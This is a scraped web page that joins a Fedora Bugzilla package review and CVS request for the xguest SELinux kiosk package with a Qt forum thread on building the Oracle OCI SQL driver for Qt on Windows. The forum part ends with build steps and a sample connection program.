no-reload-entry /etc/rc.d/init.d/xguest xguest.noarch: W: uncompressed-zip /etc/desktop-profiles/xguest.zip All these warnings and errors are OK as I wrote in comment #7. The suggested fixes were applied. Package is ACCEPTed. One more suggestion - when the namespace.conf file is modified I'd suggest to add a comment line before and after the xguest configuration so it will be easy to remove it as soon as the configuration is moved to an extra file in the future namespace.d. And in the %preun you can already remove these lines between the comment lines. SRPM URL: Has been updated with all your suggested fixes. Spec file now deletes the namespace.conf entry on removal. Dan, the CVS process is here: Please append a New Package CVS Request to this ticket and flip the flag back to ?. New Package CVS Request ======================= Package Name: dwalsh Short Description: SELinux Kiosk User account setup program Owners: dwalsh@redhat.com Branches: F-8 Rawhide InitialCC: sgrubb@redhat.com Cvsextras Commits: Yes New Package CVS Request ======================= Package Name: dwalsh Short Description: SELinux Kiosk User account setup program Owners: dwalsh Branches: F-8 Rawhide InitialCC: sgrubb Cvsextras Commits: No Umm, Dan? Is the package name really dwalsh? I almost committed that to cvs. :) Also, you don't need to list Rawhide as a branch, you always get that one. cvs is done. Package Name: xguest package is in the repos now, closing.
https://bugzilla.redhat.com/show_bug.cgi?id=353931
CC-MAIN-2017-30
refinedweb
898
68.57
Important: Please read the Qt Code of Conduct - [SOLVED] connect oracle database from qt creator Hi everyone On windows platform I am trying to connect oracle database but i have an error QSqlDatabase: QOCI driver not loaded. I installer oracle client and pl/sql developer on my machine and everything works fine. Also i read qt documentation but it didn't help me. Is there up to date clear tutorial how to install oci plugin on windows(and on every platform)? Please Help Hi, are the oci.dll in the PATH?? Did you mean PATH in Environment Variables? yes they are. Ok, I remember I had some issues in the past to setup OCI Qt drivers on Windows but I don't remember how solved them (sorry). Now I'm on a Mac and I'm not using anymore Windows (sorry again). Is the driver built and installed correctly? QSqlDatabase::drivers() shows the QOCI driver?? Yes I tried, output is QSQLITE, QODBC, QODBC3 Ok. I found solution. Documentation says. but make or nmake didn't work for me. Because I have not installed Microsoft Visual c++ on my machine. I made instruction how to do this: 1 . At first don't forget to install qt sources. During the installation check Sources checkbox. 2 . then download and install oracle client win32_11gR2_client.zip. choose Runtime option during installation.(even if you are using 64 bit os download 32 bit version on oracle client). It creates c:\app\user\product\client_1... directory 3 . then open qt minGW command line(start ->all programs -> qt[version] -> [version] -> MinGW [version] -> Qt [version] for Desktop MinGW [version]) and move to the oci source folder: cd C:\Qt\Qt[version][version]\Src\qtbase\src\plugins\sqldrivers\oci 4 . then as documentation says include OCI(Oracle call interface) path and library: set INCLUDE=%INCLUDE%;c:\app\user\product[version]\client_1\oci\include set LIB=%LIB%;c:\app\user\product[version]\client_1\oci\lib\msvc 5 . compile oci driver by executing these two lines: qmake oci.pro mingw32-make it will creates two .dll files for you qsqloci.dll(release version) and qsqlocid.dll(debug version) 6 . last step is to copy these two files into qtcreator installation folder. go to the: C:\Qt\Qt[version][version]\Src\qtbase\plugins\sqldrivers and copy these files into: C:\Qt\Qt[version][version]\mingw[version]\plugins\sqldrivers and you are ready to go. to check connection try this code: #include <QCoreApplication> #include <QtSql> #include <QDebug> int main(int argc, char *argv[]) { QCoreApplication a(argc, argv); QSqlDatabase db = QSqlDatabase::addDatabase("QOCI"); db.setHostName("MY_IP_OR_HOST_NAME"); db.setDatabaseName("XE"); db.setUserName("test"); db.setPassword("test_password"); if (!db.open()) { qDebug() << db.lastError().text(); } else{ qDebug() << "Wow opened"; } return a.exec(); }
https://forum.qt.io/topic/53051/solved-connect-oracle-database-from-qt-creator
CC-MAIN-2020-34
refinedweb
454
52.36